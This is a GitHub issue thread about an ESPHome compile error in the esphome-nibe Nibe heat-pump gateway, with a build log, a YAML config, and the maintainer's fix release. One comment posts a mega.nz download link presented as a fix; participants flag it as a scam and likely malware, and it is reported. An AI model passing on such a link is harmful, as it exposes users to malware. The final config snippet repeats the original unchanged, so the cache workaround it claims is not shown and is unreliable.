elupus/esphome-nibe #74: Error compiling esphome-nibe on Home Assistant 2024.8.2 with ESPHome 2024.8.0

kleinarne, 2024-08-25:
```
Updating /config/esphome/nibegw.yaml
------------------------------------------------------------

INFO ESPHome 2024.8.0
INFO Reading configuration /config/esphome/nibegw.yaml...
INFO Generating C++ source...
INFO Compiling app...
Processing nibegw (board: esp32dev; framework: arduino; platform: platformio/espressif32@5.4.0)
--------------------------------------------------------------------------------
Library Manager: Installing esphome/AsyncTCP-esphome @ 2.1.3
INFO Installing esphome/AsyncTCP-esphome @ 2.1.3
Downloading  [####################################]  100%
Unpacking  [####################################]  100%
Library Manager: AsyncTCP-esphome@2.1.3 has been installed!
INFO AsyncTCP-esphome@2.1.3 has been installed!
Library Manager: Installing esphome/ESPAsyncWebServer-esphome @ 3.2.2
INFO Installing esphome/ESPAsyncWebServer-esphome @ 3.2.2
Downloading  [####################################]  100%
Unpacking  [####################################]  100%
Library Manager: ESPAsyncWebServer-esphome@3.2.2 has been installed!
INFO ESPAsyncWebServer-esphome@3.2.2 has been installed!
Library Manager: Resolving dependencies...
INFO Resolving dependencies...
Library Manager: Installing esphome/noise-c @ 0.1.6
INFO Installing esphome/noise-c @ 0.1.6
Unpacking  [####################################]  100%
Library Manager: noise-c@0.1.6 has been installed!
INFO noise-c@0.1.6 has been installed!
Library Manager: Resolving dependencies...
INFO Resolving dependencies...
Library Manager: Installing esphome/libsodium @ 1.10018.4
INFO Installing esphome/libsodium @ 1.10018.4
Unpacking  [####################################]  100%
Library Manager: libsodium@1.10018.4 has been installed!
INFO libsodium@1.10018.4 has been installed!
HARDWARE: ESP32 240MHz, 320KB RAM, 4MB Flash
 - toolchain-xtensa-esp32 @ 8.4.0+2021r2-patch5
Dependency Graph
|-- AsyncTCP-esphome @ 2.1.3
|-- WiFi @ 2.0.0
|-- FS @ 2.0.0
|-- Update @ 2.0.0
|-- ESPAsyncWebServer-esphome @ 3.2.2
|-- DNSServer @ 2.0.0
|-- ESPmDNS @ 2.0.0
|-- noise-c @ 0.1.6
|-- ESP32 Async UDP @ 2.0.0
Compiling .pioenvs/nibegw/src/esphome/components/api/api_connection.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/api/api_frame_helper.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/api/api_pb2.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/api/api_pb2_service.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/api/api_server.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/api/list_entities.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/api/proto.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/api/subscribe_state.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/api/user_services.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/button/button.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/captive_portal/captive_portal.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/esp32/core.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/esp32/gpio.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/esp32/preferences.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/esphome/ota/ota_esphome.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/gpio/output/gpio_binary_output.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/logger/logger.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/logger/logger_esp32.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/logger/logger_esp8266.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/logger/logger_host.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/logger/logger_libretiny.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/logger/logger_rp2040.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/md5/md5.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/mdns/mdns_component.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/mdns/mdns_esp32.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/mdns/mdns_esp8266.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/mdns/mdns_host.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/mdns/mdns_libretiny.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/mdns/mdns_rp2040.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/network/util.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/nibegw/NibeGw.cpp.o
Compiling .pioenvs/nibegw/src/esphome/components/nibegw/NibeGwClimate.cpp.o
In file included from src/esphome/components/nibegw/NibeGwClimate.cpp:3:
src/esphome/components/nibegw/NibeGwClimate.h:9:10: fatal error: esphome/components/climate/climate.h: No such file or directory
 #include "esphome/components/climate/climate.h"
          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
compilation terminated.
*** [.pioenvs/nibegw/src/esphome/components/nibegw/NibeGwClimate.cpp.o] Error 1
========================= [FAILED] Took 43.55 seconds =========================
=========== [ERROR] /config/esphome/nibegw.yaml ===========

======================== [SUMMARY] ========================
  - /config/esphome/nibegw.yaml: FAILED
```

config:

```
esphome:
  name: nibegw
  comment: Nibegw

esp32:
  board: esp32dev
  framework:
    type: arduino

# Enable logging
logger:

# Enable Home Assistant API
api:
  encryption:
    key: "secretkey"

ota:
  platform: esphome
  password: "otapassword"

wifi:
  ssid: !secret ioc_wifi_ssid
  password: !secret ioc_wifi_password
  fast_connect: true

  # Enable fallback hotspot (captive portal) in case wifi connection fails
  ap:
    ssid: "Nibegw Fallback Hotspot"
    password: "password"

  manual_ip:
    # Set this to the IP of the ESP
    static_ip: 192.168.0.201
    # Set this to the IP address of the router. Often ends with .1
    gateway: 192.168.0.1
    # The subnet of the network. 255.255.255.0 works for most home networks.
    subnet: 255.255.255.0

# Load nibe component
external_components:
  - source: github://elupus/esphome-nibe

# Set pins required for LilyGo T-CAN485 board
output:
  - platform: gpio
    id: ENABLE_PIN # Enable the chip
    pin:
      number: GPIO19
      inverted: true
  - platform: gpio
    id: SE_PIN # Enable autodirection
    pin:
      number: GPIO17
      inverted: true
  - platform: gpio
    id: ENABLE_5V_PIN # Enable 5V pin for RS485 chip
    pin:
      number: GPIO16
      inverted: true

# Configure uart that will be used
uart:
  rx_pin: GPIO21
  tx_pin: GPIO22
  baud_rate: 9600

# Configure NibeGW
nibegw:
  udp:
    # The target address(s) to send data to. May be a multicast address.
    target:
      - ip: 192.168.0.11
        port: 10090

    # List of source address to accept data from, may be empty for no filter
    source:
      - 192.168.0.11

  acknowledge:
    - MODBUS40

  # Constant replies to certain requests cabe made
  constants:
    - address: MODBUS40
      token: ACCESSORY
      data: [
            0x0A, # MODBUS version low
            0x00, # MODBUS version high
            0x01, # MODBUS address?
      ]

# Some helper functions to restart ESPHome from HA
button:
- platform: restart
  name: Nibegw Restart
- platform: safe_mode
  name: Nibegw Safe Mode Boot

captive_portal:
    
```

Zoraaa-z, 2024-08-25:
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

kleinarne, 2024-08-25:
Unless the project author confirms this, everybody consider Zoraaa-z a scammer and the mega.nz link malware.

closed 2024-08-25 by elupus

elupus, 2024-08-25:
> Unless the project author confirms this, everybody consider Zoraaa-z a scammer and the mega.nz link malware.

Thanks for the heads-up. Deleted and reported.

kleinarne, 2024-08-25:
Sure thing, I've reported him too.

I'm still getting the error in ESPHome. How can I tell if the fix is already available in my Home Assistant / ESPHome?

elupus, 2024-08-25:
I made a new release so should be available. 3.0.1

kleinarne, 2024-08-25:
@elupus apparently blocking the user in GitHub will prevent them from interacting with your repositories.

Still getting the error btw. Maybe 3.0.0 is still cached somewhere in the toolchain, I’ll try again tomorrow.

kleinarne, 2024-08-26:
As I suspected, someone in the ESPHome discord confirmed that there is a default 24h cache for external components.

Updating the yaml configuration above with the following circumvented that cache, and the update finished successfully:

```
# Load nibe component
external_components:
  - source: github://elupus/esphome-nibe
```

PR #75 (2024-08-25): Auto load climate and sensor
Fixes #74